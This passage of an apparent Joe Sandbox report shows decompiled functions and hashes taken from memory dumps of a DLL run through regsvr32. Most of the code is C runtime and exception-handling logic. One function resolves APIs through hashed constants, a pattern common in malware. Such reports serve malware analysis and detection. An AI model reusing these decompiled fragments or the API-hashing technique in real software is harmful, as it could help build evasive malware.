                                				_t7 = _t94 + 0x70; // 0x58
                                				 *((long long*)(_t94 + 0x48)) = _t7;
                                				_t10 = _t91 + 0x10; // -1272
                                				_t57 = _t10;
                                				 *((long long*)(_t94 + 0x50)) = _t57;
                                				__imp__RtlCaptureContext();
                                				r8d = 0;
                                				__imp__RtlLookupFunctionEntry();
                                				if (_t57 == 0) goto 0x130ee446;
                                				 *(_t94 + 0x38) =  *(_t94 + 0x38) & 0x00000000;
                                				_t16 = _t94 + 0x60; // 0x48
                                				 *((long long*)(_t94 + 0x30)) = _t16;
                                				_t19 = _t94 + 0x58; // 0x40
                                				 *((long long*)(_t94 + 0x28)) = _t19;
                                				_t21 = _t91 + 0x10; // -1272
                                				 *((long long*)(_t94 + 0x20)) = _t21;
                                				__imp__RtlVirtualUnwind();
                                				 *((long long*)(_t91 + 0x108)) =  *((intOrPtr*)(_t91 + 0x508));
                                				_t25 = _t91 + 0x508; // 0x0
                                				 *((long long*)(_t94 + 0x70)) = __rdx;
                                				 *((long long*)(_t91 + 0xa8)) = _t25 + 8;
                                				_t61 =  *((intOrPtr*)(_t91 + 0x508));
                                				 *((long long*)(_t91 - 0x80)) = _t61;
                                				 *(_t94 + 0x74) = _t84;
                                				IsDebuggerPresent();
                                				SetUnhandledExceptionFilter(_t84, _t90);
                                				_t42 = UnhandledExceptionFilter(_t100);
                                				if (_t61 != 0) goto 0x130ee4a8;
                                				if (_t61 != 0) goto 0x130ee4a8;
                                				if (_t65 == 0xffffffff) goto 0x130ee4a8;
                                				_t43 = E00007FFC7FFC130EBC04(_t42);
                                				E00007FFC7FFC130F6D80();
                                				return _t43;
                                			}


















                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                 • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                • String ID:
                                • API String ID: 1239891234-0
                                • Opcode ID: 07dcb6749cf727804a818c63ef9eb218394f6ec07e419224f6cd5021fde535cb
                                • Instruction ID: b8fa9b1c3342f5cd195a218d8db54b39ca3dff7b40b19d0f41d7a57df183d9ef
                                • Opcode Fuzzy Hash: 07dcb6749cf727804a818c63ef9eb218394f6ec07e419224f6cd5021fde535cb
                                • Instruction Fuzzy Hash: EE316E36708F9586EB60CF25E8442AE73A4FB88768F500535EA9D53B98DF3CC565CB10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 45%
                                			E00737FD4(void* __ecx, signed int __edx, void* __ebp, long long* __rax, long long __rbx, void* __rcx, long long __rsi, char* __r8) {
                                				void* __rdi;
                                				signed int _t34;
                                				void* _t48;
                                				void* _t53;
                                				void* _t54;
                                				void* _t55;
                                				void* _t67;
                                				void* _t99;
                                				char* _t101;
                                				long long _t107;
                                				void* _t108;
                                				void* _t110;
                                				void* _t111;
                                				signed long long _t123;
                                
                                				_t78 = __rbx;
                                				_t77 = __rax;
                                				_t67 = __ebp;
                                				_t55 = __ecx;
                                				 *((long long*)(_t110 + 8)) = __rbx;
                                				 *((long long*)(_t110 + 0x18)) = _t107;
                                				 *((long long*)(_t110 + 0x20)) = __rsi;
                                				_push(_t123);
                                				_t111 = _t110 - 0x40;
                                				r14d =  *0x73d450;
                                				_t108 = __rcx;
                                				_t81 =  *0x73d458;
                                				_t105 =  *((intOrPtr*)( *0x73d458 + 8));
                                				r12d = 0;
                                				_t34 = r14d ^ __edx;
                                				_t101 = __r8;
                                				if(_t34 == 0x139d2b8d) {
                                					L20:
                                					_t78 =  *(_t108 + 0x50);
                                					if( *(_t108 + 0x50) == 0) {
                                						_t54 = 0x426;
                                					} else {
                                						E0073908C(0xf2d20ec6, _t77,  *((intOrPtr*)(_t81 + 0x18)));
                                						if(_t77 == 0) {
                                						} else {
                                							 *_t77();
                                						}
                                						asm("sbb ebx, ebx");
                                						_t54 = _t53 + 0x4ce;
                                					}
                                					if(r12d == 0 || _t54 != 0x426) {
                                						L43:
                                						if( *((long long*)(_t111 + 0x80)) != 0 && _t54 != 0x3e5) {
                                							r8d = _t54;
                                							E00736AC0(_t54, _t55, _t67, _t77, _t78, _t108,  *((intOrPtr*)(_t111 + 0x80)), _t105, _t108);
                                						}
                                						return _t54;
                                					} else {
                                						L31:
                                						_t54 = 0x57;
                                						if(_t101 == 0 ||  *_t101 == 0) {
                                							L37:
                                							r12d = 1;
                                							if(_t54 != 0) {
                                								goto L43;
                                							}
                                							L38:
                                							_t105 =  *(_t108 + 0x50);
                                							if( *(_t108 + 0x50) == 0) {
                                								_t54 = 0x426;
                                							} else {
                                								 *(_t108 + 0x50) =  *(_t108 + 0x50) & 0x00000000;
                                								_t77 =  *0x73d458;
                                								_t78 =  *((intOrPtr*)( *0x73d458 + 8));
                                								E00732874(_t54, _t55,  *((intOrPtr*)( *0x73d458 + 8)), _t105, _t101, _t105);
                                								HeapFree(??, ??, ??);
                                								_t54 = 0;
                                							}
                                							if(r12d != 0) {
                                								_t27 = _t111 + 0x30; // 0x31
                                								_t54 = E00739214(_t78, _t27, _t101, _t105, _t108,  *((intOrPtr*)(_t108 + 0x38)), _t108 + 0x50);
                                							}
                                							goto L43;
                                						} else {
                                							E0073487A();
                                							_t98 = _t111 + 0x30;
                                							if(E00735448(_t55, _t77, _t78, _t101, _t111 + 0x30, _t105, _t108) != 0) {
                                								L36:
                                								_t54 = 0;
                                								goto L37;
                                							}
                                							if(E0073672C(_t101, _t98, _t111 + 0x68) == 0) {
                                								goto L37;
                                							}
                                							asm("ror ax, 0x8");
                                							 *((short*)(_t111 + 0x32)) =  *(_t111 + 0x68) & 0x0000ffff;
                                							goto L36;
                                						}
                                					}
                                				}
                                				if(_t34 == 0x15f5a8c2) {
                                					if(r9d == 0) {
                                						L15:
                                						_t54 = 0x57;
                                						goto L43;
                                					}
                                					E007385CC(r9d, __rbx, __r8, _t105);
                                					if(_t77 == 0) {
                                						L14:
                                						_t54 = 8;
                                						goto L43;
                                					}
                                					_t99 = 0x735c80;
                                					L11:
                                					 *(_t111 + 0x20) =  *(_t111 + 0x20) & _t123;
                                					_t48 = E007314B8(_t53, _t55, _t77, _t78, _t108, _t99, _t105, _t77,  *((intOrPtr*)(_t111 + 0x80)));
                                					_t54 = _t48;
                                					if(_t48 != 0) {
                                						HeapFree();
                                					} else {
                                						_t54 = 0x3e5;
                                					}
                                					goto L43;
                                				}
                                				if(_t34 == 0x2f77acf9) {
                                					r12d = 1;
                                					goto L20;
                                				}
                                				if(_t34 == 0x48e12436) {
                                					goto L38;
                                				}
                                				if(_t34 == 0x4d382929) {
                                					goto L31;
                                				}
                                				if(_t34 == 0xb016dc39) {
                                					E0073908C(0xd97160e4, __rax,  *((intOrPtr*)(_t81 + 0x18)));
                                					if(_t77 != 0) {
                                						 *_t77();
                                					}
                                					_t54 = 0;
                                					goto L43;
                                				}
                                				if(_t34 == 0xb057dfc9) {
                                					if(r9d == 0) {
                                						goto L15;
                                					}
                                					E007385CC(r9d, __rbx, __r8, _t105);
                                					if(_t77 == 0) {
                                						goto L14;
                                					}
                                					_t99 = 0x7334a4;
                                					goto L11;
                                				} else {
                                					_t5 = _t123 + 1; // 0x1
                                					_t54 = _t5;
                                					goto L43;
                                				}
                                			}


















                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: FreeHeap
                                • String ID: ))8M$6$H$lJu
                                • API String ID: 3298025750-2816507560
                                • Opcode ID: e943009c52edc3a9ff9218d50e7176983ae45fe1d98091206747ec6dadb96f7e
                                • Instruction ID: 0d2e2e900af96e964d89dc15baad65124a3dd91add26df510cf94221701484b8
                                • Opcode Fuzzy Hash: e943009c52edc3a9ff9218d50e7176983ae45fe1d98091206747ec6dadb96f7e
                                • Instruction Fuzzy Hash: 0751D621704B8582FBA99BA6D88436A5361FB84BC4F588026FF4A4775BDF7CC846C302
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 64%
                                			E00007FFC7FFC130EF964(void* __edx, long long* __rax, long long __rbx, intOrPtr* __rcx, long long __rdx, long long _a8, void* _a16, long long _a24, intOrPtr _a26, long long _a32) {
                                				long long _v72;
                                				intOrPtr _v80;
                                				void* _v88;
                                				long long _v96;
                                				long long _v104;
                                				void* __rdi;
                                				void* __rsi;
                                				void* __rbp;
                                				void* _t33;
                                				void* _t36;
                                				void* _t43;
                                				void* _t44;
                                				signed long long _t65;
                                				long long _t67;
                                				long long _t68;
                                				long long _t69;
                                				long long _t76;
                                				void* _t81;
                                				void* _t88;
                                				long long _t104;
                                				void* _t110;
                                				intOrPtr* _t112;
                                				void* _t114;
                                				void* _t117;
                                				intOrPtr _t129;
                                				void* _t131;
                                				void* _t132;
                                				signed long long _t133;
                                				signed long long _t134;
                                				signed long long _t137;
                                				intOrPtr* _t138;
                                
                                				_t43 = __edx;
                                				_a8 = __rbx;
                                				_a16 = __rdx;
                                				if (__rdx != 0) goto 0x130ef9a0;
                                				_t33 = E00007FFC7FFC130EE6A0(__rax);
                                				 *__rax = 0x16;
                                				E00007FFC7FFC130EE580(_t33);
                                				goto 0x130efb40;
                                				asm("xorps xmm0, xmm0");
                                				 *((long long*)(__rdx)) = 0;
                                				asm("movdqu [ebp-0x20], xmm0");
                                				_v72 = 0;
                                				if ( *__rcx == 0) goto 0x130efa0b;
                                				_a24 = 0x3f2a;
                                				_a26 = dil;
                                				E00007FFC7FFC130F3218( *((intOrPtr*)(0x16)),  &_a24);
                                				if (0x16 != 0) goto 0x130ef9e2;
                                				r8d = 0;
                                				_t36 = E00007FFC7FFC130EFB70(0x16,  *((intOrPtr*)(0x16)), 0, 0, _t110, _t114, _t117,  &_v88);
                                				goto 0x130ef9ee;
                                				0x130efc80();
                                				r14d = _t36;
                                				if (0x16 != 0) goto 0x130ef9fe;
                                				goto 0x130ef9b2;
                                				goto 0x130efb04;
                                				_t112 = _v88;
                                				_t129 = _v80;
                                				_a24 = 0;
                                				_t65 = _t129 - _t112;
                                				_t137 = (_t65 >> 3) + 1;
                                				_t88 =  >  ? 0 : _t65 + 7 >> 3;
                                				_t134 = _t133 | 0xffffffff;
                                				if (_t88 == 0) goto 0x130efa6d;
                                				_t67 = _t134 + 1;
                                				if ( *((intOrPtr*)( *_t112 + _t67)) != dil) goto 0x130efa4e;
                                				if (1 != _t88) goto 0x130efa48;
                                				_a24 = 1 + _t67;
                                				r8d = 1;
                                				E00007FFC7FFC130ED6D0(_t137, 1 + _t67, 1);
                                				_t76 = _t67;
                                				if (_t67 == 0) goto 0x130efafd;
                                				_t104 = _t67 + _t137 * 8;
                                				_t138 = _t112;
                                				_v96 = _t104;
                                				_t68 = _t104;
                                				_a32 = _t104;
                                				if (_t112 == _t129) goto 0x130efaf3;
                                				_v104 = _t76 - _t112;
                                				_t131 = _t134 + 1;
                                				if ( *((intOrPtr*)( *_t138 + _t131)) != dil) goto 0x130efaad;
                                				_t132 = _t131 + 1;
                                				E00007FFC7FFC130F3144(_t43, _t68, _t76, _t68, _t104 - _t68 + _a24, _t132);
                                				if (_t68 != 0) goto 0x130efb58;
                                				_t69 = _a32;
                                				 *((long long*)(_v104 + _t138)) = _t69;
                                				_a32 = _t69 + _t132;
                                				if (_t138 + 8 != _t129) goto 0x130efaa7;
                                				r14d = _t44;
                                				 *_a16 = _t76;
                                				E00007FFC7FFC130EE114(_a16, 0);
                                				_t81 =  >  ? 0 : _t129 - _t112 + 7 >> 3;
                                				if (_t81 == 0) goto 0x130efb35;
                                				E00007FFC7FFC130EE114(_a16,  *_t112);
                                				if (1 != _t81) goto 0x130efb21;
                                				E00007FFC7FFC130EE114(_a16, _t112);
                                				return r14d;
                                			}



































                                APIs
                                • _invalid_parameter_noinfo.LIBCMT ref: 00007FFC130EF994
                                  • Part of subcall function 00007FFC130EE5A0: IsProcessorFeaturePresent.KERNEL32(00007FFC130F0B95), ref: 00007FFC130EE5A9
                                  • Part of subcall function 00007FFC130EE5A0: GetCurrentProcess.KERNEL32(00007FFC130F0B95), ref: 00007FFC130EE5CD
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                                • String ID: *?$.
                                • API String ID: 4036615347-3972193922
                                • Opcode ID: 4cda8f812522c02942c11826489b886558005b358df05b685b12336f39f260f7
                                • Instruction ID: f95dd1a1179fcd6098ac39930be04504ea9cde9839ea17868ce99e4dd37e3983
                                • Opcode Fuzzy Hash: 4cda8f812522c02942c11826489b886558005b358df05b685b12336f39f260f7
                                • Instruction Fuzzy Hash: 30510162B15FA981EB10DFA298000B963E4FB44BECB454536DE1D27BC9EE3CD466C320
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 87%
                                			E00007FFC7FFC130EE9E0(void* __rax, long long __rbx, signed int* __rcx, char* __rdx, long long _a8) {
                                				long long _v24;
                                				signed char _t21;
                                				void* _t27;
                                				void* _t29;
                                				void* _t41;
                                				signed int _t47;
                                				signed int _t52;
                                				signed int _t68;
                                				char* _t84;
                                				char* _t85;
                                				char* _t87;
                                				char* _t89;
                                				char* _t90;
                                				void* _t91;
                                				void* _t92;
                                				char _t98;
                                				void* _t103;
                                				void* _t121;
                                
                                				_a8 = __rbx;
                                				_t68 =  *0x13124dc8; // 0x0
                                				_v24 = 0;
                                				asm("movsd xmm0, [esp+0x20]");
                                				asm("movsd [edi], xmm0");
                                				__rcx[2] = 0;
                                				__rcx[1] = _t68;
                                				if ( *__rdx != 0x20) goto 0x130eea1a;
                                				_t84 = __rdx + 1;
                                				if ( *_t84 == 0x20) goto 0x130eea12;
                                				if ( *_t84 == 0x61) goto 0x130eea40;
                                				if ( *_t84 == 0x72) goto 0x130eea35;
                                				if ( *_t84 != 0x77) goto 0x130eec5d;
                                				 *__rcx = 0x301;
                                				goto 0x130eea46;
                                				 *__rcx =  *__rcx & 0;
                                				__rcx[1] = 1;
                                				goto 0x130eea4d;
                                				 *__rcx = 0x109;
                                				__rcx[1] = 2;
                                				_t85 = _t84 + 1;
                                				r9b = 0;
                                				r11b = 0;
                                				r10b = 0;
                                				r8b = 0;
                                				if ( *_t85 == 0) goto 0x130eeb8b;
                                				_t98 =  *_t85;
                                				_t41 = _t98 - 0x53;
                                				if (_t41 > 0) goto 0x130eeb0c;
                                				if (_t41 == 0) goto 0x130eeafc;
                                				if (_t41 == 0) goto 0x130eeb79;
                                				if (_t41 == 0) goto 0x130eead0;
                                				if (_t41 == 0) goto 0x130eeac8;
                                				if (_t41 == 0) goto 0x130eeab6;
                                				_t103 = _t98 - 0xfffffffffffffff2;
                                				if (_t41 == 0) goto 0x130eeaad;
                                				if (_t103 != 4) goto 0x130eec5d;
                                				if (r10b != 0) goto 0x130eeb6d;
                                				 *__rcx =  *__rcx | 0x00000010;
                                				goto 0x130eeb04;
                                				asm("bts dword [edi], 0x7");
                                				goto 0x130eeb77;
                                				if ((_t21 & 0x00000040) != 0) goto 0x130eeb6d;
                                				goto 0x130eeb75;
                                				r8b = 1;
                                				goto 0x130eeb6d;
                                				if (r11b != 0) goto 0x130eeb6d;
                                				r11b = 1;
                                				if ((_t21 & 0x00000002) != 0) goto 0x130eeb6d;
                                				 *__rcx =  *__rcx & 0xfffffffe | 0x00000002;
                                				__rcx[1] = __rcx[1] & 0xfffffffc | 0x00000004;
                                				goto 0x130eeb77;
                                				_t47 = r10b;
                                				if (_t47 != 0) goto 0x130eeb6d;
                                				 *__rcx =  *__rcx | 0x00000020;
                                				r10b = 1;
                                				goto 0x130eeb79;
                                				if (_t47 == 0) goto 0x130eeb65;
                                				if (_t47 == 0) goto 0x130eeb56;
                                				if (_t47 == 0) goto 0x130eeb44;
                                				if (_t47 == 0) goto 0x130eeb38;
                                				if (_t103 - 0x3a != 6) goto 0x130eec5d;
                                				if (( *__rcx & 0x0000c000) != 0) goto 0x130eeb6d;
                                				asm("bts eax, 0xe");
                                				goto 0x130eeb75;
                                				if (r9b != 0) goto 0x130eeb6d;
                                				asm("btr dword [edi+0x4], 0xb");
                                				goto 0x130eeb4e;
                                				if (r9b != 0) goto 0x130eeb6d;
                                				asm("bts dword [edi+0x4], 0xb");
                                				r9b = 1;
                                				goto 0x130eeb79;
                                				_t52 =  *__rcx & 0x0000c000;
                                				if (_t52 != 0) goto 0x130eeb6d;
                                				asm("bts eax, 0xf");
                                				goto 0x130eeb75;
                                				asm("bt eax, 0xc");
                                				if (_t52 >= 0) goto 0x130eeb71;
                                				goto 0x130eeb79;
                                				asm("bts eax, 0xc");
                                				if (1 != 0) goto 0x130eea5e;
                                				if (r8b == 0) goto 0x130eeb93;
                                				_t87 = _t85 + 1;
                                				if ( *_t87 == 0x20) goto 0x130eeb90;
                                				if (r8b != 0) goto 0x130eebaf;
                                				if ( *_t87 != 0) goto 0x130eec5d;
                                				__rcx[2] = 1;
                                				goto 0x130eec6d;
                                				r8d = 3;
                                				E00007FFC7FFC130F1B40(_t29, _t87, 0x1310ed38, _t121);
                                				if (0 != 0) goto 0x130eec5d;
                                				goto 0x130eebd5;
                                				_t89 = _t87 + 4;
                                				if ( *_t89 == 0x20) goto 0x130eebd2;
                                				if ( *_t89 != 0x3d) goto 0x130eec5d;
                                				_t90 = _t89 + 1;
                                				if ( *_t90 == 0x20) goto 0x130eebdf;
                                				r8d = 5;
                                				E00007FFC7FFC130F1C08(1, 0, _t90);
                                				if (0 != 0) goto 0x130eec0a;
                                				_t91 = _t90 + 5;
                                				asm("bts dword [edi], 0x12");
                                				goto 0x130eec53;
                                				r8d = 8;
                                				E00007FFC7FFC130F1C08(1, 0, _t91);
                                				if (0 != 0) goto 0x130eec2d;
                                				_t92 = _t91 + 8;
                                				asm("bts dword [edi], 0x11");
                                				goto 0x130eec53;
                                				r8d = 7;
                                				E00007FFC7FFC130F1C08(1, 0, _t92);
                                				if (0 != 0) goto 0x130eec5d;
                                				asm("bts dword [edi], 0x10");
                                				goto 0x130eec53;
                                				if ( *((char*)(_t92 + 8)) == 0x20) goto 0x130eec50;
                                				goto 0x130eeb9d;
                                				_t27 = E00007FFC7FFC130EE6A0(0);
                                				 *((long long*)(0)) = 0x16;
                                				return E00007FFC7FFC130EE580(_t27);
                                			}


                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter_noinfo
                                • String ID: $ $ $ $ $=$UTF-16LEUNICODE$UTF-8$a$ccs$r$w
                                • API String ID: 3215553584-2974328796
                                • Opcode ID: 3d3d684f05ca60b9351f6ae1519f0e4da1bcc7ff1a8d1dac3fd3f5df153a3e81
                                • Instruction ID: d9a1f6b03bdfcfdbed7ee447770e303240d7aa242ef540ab3fabfea4184fdd53
                                • Opcode Fuzzy Hash: 3d3d684f05ca60b9351f6ae1519f0e4da1bcc7ff1a8d1dac3fd3f5df153a3e81
                                • Instruction Fuzzy Hash: 26718C72F0DE7F86F7694A249A5433A2AD1AF1236CF189435CA1E625D1CB2CBC30D721
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 39%
                                			E00007FFC7FFC130F243C(void* __ebx, void* __eflags, signed long long __rbx, long long* __rcx, signed int* __rdx, signed long long __rdi, void* __rsi, signed long long __r8) {
                                				void* __rbp;
                                				void* _t134;
                                				void* _t144;
                                				signed char _t148;
                                				signed char _t149;
                                				void* _t150;
                                				void* _t152;
                                				void* _t153;
                                				signed int _t169;
                                				signed long long* _t173;
                                				unsigned long long _t174;
                                				signed long long _t177;
                                				signed long long _t178;
                                				signed long long* _t181;
                                				intOrPtr _t187;
                                				long long _t193;
                                				long long* _t202;
                                				signed long long _t205;
                                				signed long long* _t206;
                                				signed long long _t215;
                                				signed long long _t229;
                                				intOrPtr _t238;
                                				signed long long _t239;
                                				signed long long _t268;
                                				signed long long _t270;
                                				signed int* _t275;
                                				void* _t278;
                                				void* _t279;
                                				signed long long* _t281;
                                				void* _t282;
                                				void* _t290;
                                				void* _t292;
                                				void* _t297;
                                				void* _t300;
                                
                                				_t277 = __rsi;
                                				_t173 = _t281;
                                				_t173[1] = __rbx;
                                				_t173[2] = __rdi;
                                				_t173[3] = __r8;
                                				_t279 = _t173 - 0x47;
                                				_t282 = _t281 - 0xc0;
                                				r12d = r9d;
                                				r9d =  *(_t279 + 0x77);
                                				_t275 = __rdx;
                                				r8d =  *(_t279 + 0x6f);
                                				_t202 = __rcx;
                                				E00007FFC7FFC130F20A8(r12d, __eflags, _t173, __rcx, _t279 - 1, _t279);
                                				asm("movups xmm0, [eax]");
                                				asm("movups xmm1, xmm0");
                                				asm("psrldq xmm1, 0x8");
                                				asm("dec cx");
                                				 *(_t279 - 0x11) = _t300 >> 0x20;
                                				asm("movups [ebp-0x59], xmm0");
                                				asm("movsd xmm0, [eax+0x10]");
                                				asm("movsd [ebp-0x31], xmm0");
                                				asm("movsd [ebp-0x49], xmm0");
                                				if (r15d != 0xffffffff) goto 0x130f24c7;
                                				E00007FFC7FFC130EE680(_t173);
                                				 *_t173 =  *_t173 & 0x00000000;
                                				 *__rdx =  *__rdx | 0xffffffff;
                                				E00007FFC7FFC130EE6A0(_t173);
                                				_t174 =  *_t173;
                                				goto 0x130f280e;
                                				E00007FFC7FFC130F3C80(r12d, _t152, _t174, _t202, _t279 - 1, __rdx, __rdx, __rsi);
                                				 *__rdx = _t174;
                                				if (_t174 != 0xffffffff) goto 0x130f24eb;
                                				E00007FFC7FFC130EE680(_t174);
                                				 *_t174 =  *_t174 & 0x00000000;
                                				 *__rdx =  *__rdx | 0xffffffff;
                                				E00007FFC7FFC130EE6A0(_t174);
                                				 *_t174 = 0x18;
                                				goto 0x130f24bb;
                                				 *(_t282 + 0x30) =  *(_t282 + 0x30) & 0x00000000;
                                				r8d = r15d;
                                				 *(_t279 - 0x21) =  *(_t279 - 0x21) & 0x00000000;
                                				 *_t202 = 1;
                                				_t205 =  *(_t279 - 0x49) >> 0x00000020 |  *(_t279 - 0x49);
                                				_t177 =  !(_t174 >> 7) & 0x00000001;
                                				 *(_t282 + 0x28) = _t205;
                                				 *((long long*)(_t282 + 0x20)) =  *((intOrPtr*)(_t279 - 0x51));
                                				 *((long long*)(_t279 - 0x29)) = 0x18;
                                				 *(_t279 - 0x19) = _t177;
                                				 *(_t279 - 0x39) = _t205;
                                				CreateFileW(??, ??, ??, ??, ??, ??, ??);
                                				r14d =  *((intOrPtr*)(_t279 - 0x55));
                                				if (_t177 != 0xffffffff) goto 0x130f25df;
                                				_t178 = _t177 & 0xc0000000;
                                				if (_t178 != 0xc0000000) goto 0x130f25ac;
                                				if ((r12b & 0x00000001) == 0) goto 0x130f25ac;
                                				 *(_t282 + 0x30) =  *(_t282 + 0x30) & 0x00000000;
                                				asm("inc ecx");
                                				 *((intOrPtr*)(_t279 - 0x55)) = r14d;
                                				r8d = r15d;
                                				 *(_t282 + 0x28) = _t205;
                                				 *((long long*)(_t282 + 0x20)) =  *((intOrPtr*)(_t279 - 0x51));
                                				CreateFileW(??, ??, ??, ??, ??, ??, ??);
                                				 *(_t279 - 0x41) = _t178;
                                				if (_t178 != 0xffffffff) goto 0x130f25df;
                                				_t215 =  *__rdx;
                                				_t181 =  *((intOrPtr*)(0x13124970 + (_t215 >> 6) * 8));
                                				 *(_t181 + ((_t215 & 0x0000003f) << 6) + 0x38) =  *(_t181 + ((_t215 & 0x0000003f) << 6) + 0x38) & 0x000000fe;
                                				GetLastError();
                                				E00007FFC7FFC130EE630(_t150, _t181, _t205);
                                				goto 0x130f24bb;
                                				GetFileType(_t300);
                                				if (_t181 != 0) goto 0x130f263d;
                                				GetLastError();
                                				_t206 = _t181;
                                				E00007FFC7FFC130EE630(_t150, _t181, _t206);
                                				 *( *((intOrPtr*)(0x13124970 + ( *__rdx >> 6) * 8)) + (( *__rdx & 0x0000003f) << 6) + 0x38) =  *( *((intOrPtr*)(0x13124970 + ( *__rdx >> 6) * 8)) + (( *__rdx & 0x0000003f) << 6) + 0x38) & 0x000000fe;
                                				CloseHandle(_t297);
                                				if (_t206 != 0) goto 0x130f24bb;
                                				E00007FFC7FFC130EE6A0(_t181);
                                				 *_t181 = 0xd;
                                				goto 0x130f24bb;
                                				if (_t181 != 2) goto 0x130f264a;
                                				goto 0x130f2652;
                                				if (_t181 != 3) goto 0x130f2652;
                                				_t148 =  *(_t279 - 0x59) | 0x48;
                                				E00007FFC7FFC130F3B9C(_t148, _t150, _t153, _t206, _t178, __rdx, _t277, _t279, _t292, _t290);
                                				_t149 = _t148 | 0x00000001;
                                				 *(_t279 - 0x59) = _t149;
                                				 *( *((intOrPtr*)(0x13124970 + ( *__rdx >> 6) * 8)) + (( *__rdx & 0x0000003f) << 6) + 0x38) = _t149;
                                				_t229 =  *__rdx;
                                				_t187 =  *((intOrPtr*)(0x13124970 + (_t229 >> 6) * 8));
                                				 *((char*)(_t187 + ((_t229 & 0x0000003f) << 6) + 0x39)) = 0;
                                				if ((r12b & 0x00000002) == 0) goto 0x130f26b4;
                                				r13d = E00007FFC7FFC130F22B4(_t149, _t150, r12d, _t206, _t277);
                                				if (_t187 != 0) goto 0x130f26e3;
                                				asm("movups xmm0, [ebp-0x59]");
                                				asm("movsd xmm1, [ebp-0x31]");
                                				r8d = r12d;
                                				asm("movaps [ebp-0x1], xmm0");
                                				 *((char*)(_t279 - 0x61)) = 0;
                                				asm("movsd [ebp+0xf], xmm1");
                                				_t134 = E00007FFC7FFC130F1E14(_t150, _t206, _t279 - 1, _t277, _t279 - 0x61);
                                				if (_t187 == 0) goto 0x130f26f2;
                                				r13d = _t134;
                                				E00007FFC7FFC130F5278(_t150, r12d, _t152, _t187, _t187, _t206, _t277);
                                				goto 0x130f280e;
                                				 *((char*)( *((intOrPtr*)(0x13124970 + ( *_t275 >> 6) * 8)) + (( *_t275 & 0x0000003f) << 6) + 0x39)) =  *((intOrPtr*)(_t279 - 0x61));
                                				_t268 =  *_t275;
                                				_t270 = (_t268 & 0x0000003f) << 6;
                                				_t238 =  *((intOrPtr*)(0x13124970 + (_t268 >> 6) * 8));
                                				 *(_t238 + _t270 + 0x3d) =  *(_t238 + _t270 + 0x3d) & 0x000000fe;
                                				 *(_t238 + _t270 + 0x3d) =  *(_t238 + _t270 + 0x3d) | r12d & 0x00000001;
                                				if ((_t149 & 0x00000048) != 0) goto 0x130f2759;
                                				_t169 = r12b & 0x00000008;
                                				if (_t169 == 0) goto 0x130f2759;
                                				_t239 =  *_t275;
                                				_t193 =  *((intOrPtr*)(0x13124970 + (_t239 >> 6) * 8));
                                				 *(_t193 + ((_t239 & 0x0000003f) << 6) + 0x38) =  *(_t193 + ((_t239 & 0x0000003f) << 6) + 0x38) | 0x00000020;
                                				 *_t206 =  *_t206 >> 0xc1;
                                				if (_t169 != 0) goto 0x130f280c;
                                				if ((r12b & 0x00000001) == 0) goto 0x130f280c;
                                				CloseHandle(_t278);
                                				 *(_t282 + 0x30) =  *(_t282 + 0x30) & 0x00000000;
                                				asm("inc ecx");
                                				r8d =  *(_t279 - 0x11);
                                				 *(_t282 + 0x28) =  *(_t279 - 0x39);
